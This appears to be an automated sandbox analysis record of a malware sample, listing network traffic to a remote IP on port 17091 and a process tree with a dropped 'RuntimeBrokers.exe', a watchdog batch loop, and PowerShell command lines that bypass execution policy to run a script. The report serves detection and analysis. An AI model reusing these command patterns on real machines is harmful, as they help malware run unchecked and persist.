                                                              Dec 22, 2024 09:45:58.417634010 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417685986 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417714119 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.417756081 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417821884 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417870998 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.418019056 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.418077946 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.725394964 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725467920 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725517988 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725605965 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725661993 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725677013 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.725708008 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725750923 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725769997 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.725805998 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725883961 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725950956 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726005077 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726008892 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726049900 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726092100 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726145983 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726146936 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726191044 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726258039 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726286888 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726315975 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726358891 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726402044 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726447105 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726468086 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726497889 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726541042 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726583958 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726598024 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726634026 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726650000 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726684093 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726725101 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726741076 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726768017 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726808071 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726821899 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726867914 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726910114 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726926088 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726975918 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726988077 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727046967 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727089882 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727113962 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727139950 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727194071 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727237940 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727251053 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727281094 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727296114 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727334976 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727380037 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727422953 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727468967 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727469921 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727521896 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727565050 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727576017 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727607965 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727660894 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727708101 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727729082 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727750063 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727792025 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727844954 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727875948 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727899075 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727967024 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.728034973 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:59.771431923 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:00.121886015 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:00.122124910 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:01.754817963 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:05.756439924 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:05.756463051 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:06.107017040 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:06.107036114 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:06.108910084 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:06.109307051 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:06.507237911 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:15.751786947 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:16.102313995 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:16.131798029 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:16.532172918 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:31.388889074 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:31.739542007 CET170914976843.250.172.42192.168.11.20

Target ID: 0
Start time: 03:44:32
Start date: 22/12/2024
Path: C:\Users\user\Desktop\Fqae7BLq4m.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Fqae7BLq4m.exe"
Imagebase: 0x400000
File size: 70'322'189 bytes
MD5 hash: A994F2B3B899758BDDF5F35E407A694D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:44:40
Start date: 22/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Imagebase: 0xdc0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 03:44:40
Start date: 22/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6cf510000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 03:44:40
Start date: 22/12/2024
Path: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              Imagebase:0xc70000
                                                              File size:777'816 bytes
                                                              MD5 hash:30A274E00DA842B09E9763F19777ADED
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 5%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:03:45:50
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:03:45:50
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                              Imagebase:0xd40000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                              Imagebase:0xd40000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:03:46:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:03:46:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:18
                                                              Start time:03:46:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:03:46:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:03:46:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:21
                                                              Start time:03:46:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:03:47:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:03:47:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:03:47:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:03:47:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:03:47:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:03:47:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:28
                                                              Start time:03:48:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:29
                                                              Start time:03:48:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:30
                                                              Start time:03:48:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:31
                                                              Start time:03:48:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:32
                                                              Start time:03:48:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:03:48:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:34
                                                              Start time:03:49:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:35
                                                              Start time:03:49:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:36
                                                              Start time:03:49:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x7ff68df70000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:37
                                                              Start time:03:49:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:38
                                                              Start time:03:49:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:39
                                                              Start time:03:49:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:40
                                                              Start time:03:50:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:41
                                                              Start time:03:50:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:42
                                                              Start time:03:50:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:43
                                                              Start time:03:50:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:44
                                                              Start time:03:50:51
                                                              Start date:22/12/2024
